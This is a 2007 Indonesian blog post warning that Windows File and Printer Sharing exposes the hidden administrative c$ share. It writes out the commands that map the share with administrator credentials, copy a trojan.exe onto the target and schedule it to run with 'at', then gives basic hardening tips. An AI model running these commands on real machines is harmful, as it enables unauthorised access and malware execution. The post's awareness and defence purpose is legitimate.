Skip to content

Menjalankan program secara remote

July 23, 2007

Kegiatan windows file sharing, atau men-share folder tertentu di komputer, udah familier bagi kebanyakan dari kita. Ada yang men-share drive C secara keseluruhan, ada yang lebih berhati-hati dengan hanya men-share folder tertentu saja (berisi file-file yang memang ingin dibagi).

Tapi hari ini aku baru tau, ternyata gak ada bedanya antara sharing keseluruhan drive dengan sharing folder tertentu saja. Begitu kita mengaktifkan service ‘File and Printer Sharing’, kita membuka sebuah pintu yang BISA DIMASUKI OLEH SIAPA SAJA, meskipun tidak ada satupun folder yang di-share.

How come? Let’s prove it. Oya, untuk bisa mengakses remote komputer dengan cara ini, perlu tau username dan password administrator komputer tsb. Ketik baris-baris ini di command prompt ya.

C:\>net use x: \\10.10.2.19\c$ /user:administrator rahasiah
The command completed succesfully.

C:\>copy trojan.exe x:
1 file(s) copied.

C:\>net time \\10.10.2.19
Current time at \\10.10.2.19 is 07-23-07 9:57 AM
The command completed successfully.

C:\>at \\10.10.2.19 11:00A “c:\trojan.exe”
Added a new job with job ID = 1

C:\>at \\10.10.2.19
Status ID Day Time Command Line
——————————————————————————-
1 Today 11:00 AM c:\trojan.exe

Sekarang mari kita bahas satu-persatu. Perhatikan perintah pertama. Itu adalah perintah mapping. Ini dia bagian yang menarik. Aku tau bahwa folder yang bisa di-map hanya folder yang di-share. Nah, ternyata by default, si Windows itu punya sebuah share point untuk administrator, yaitu “c$“. Jadi meskipun KAMU gak pernah men-share folder apapun, itu c$ udah ada dengan sendirinya! Perintah pertama di atas adalah perintah untuk mapping shared folder c$, which is root directory alias DRIVE C, ke drive X local computer. Full access!

Setelah jadi drive X, selanjutnya perintah kedua meng-copy-kan file trojan.exe ke drive X tsb, alias ke root directory dari komputer 10.10.2.19.

Perintah ketiga adalah untuk mengecek jam di komputer 10.10.2.19. Selanjutnya, perintah keempat, adalah membuat sebuah schedule di komputer 10.10.2.19 untuk otomatis menjalankan file trojan.exe pada jam 11:00 AM.

Cek dengan perintah kelima, sudah terlihat ada entri scheduling untuk jam 11:00 AM. Silakan ditunggu, pada jam sekian di komputer 10.10.2.19 pasti program trojan.exe-nya jalan.

Fakta ini cukup mengerikan buatku. Ternyata sedikit sekali pengetahuan yang aku miliki tentang security. Ini hanya secuil kecil teknik hacking, dan aku yakin masih banyak teknik yang lebih canggih yang sudah diketahui duluan oleh para hacker. Bagaimana mungkin aku bisa menang lawan mereka?

Anyway, beberapa langkah pencegahan minimal tetap bisa (dan PERLU) dilakukan, misalnya:

1. Jangan menggunakan username dan password administrator standard (apalagi kalau passwordnya dibiarkan kosong😛 ). Kalau perlu malah ganti password secara berkala.
2. Kalau memang tidak ada keperluan untuk sharing folder, buang saja service ‘File and Printer Sharing’.
3. Pasang firewall. Setidaknya, dengan firewall kita bisa mengeset komputer kita ke mode ‘Stand alone’ atau ‘Stealth mode’, dengan kata lain memblokir komputer kita dari komunikasi dengan komputer lain. Aku sudah cukup lama install ZoneAlarm, dan sampai sekarang aku masih suka dengan firewall ini, karena aku bisa hanya membuka diri terhadap beberapa trusted computer saja.

Seharusnya setiap orang yang punya komputer tahu dan aware tentang keamanan komputernya sendiri.🙂

From → IT, opini

Comments are closed.

%d bloggers like this: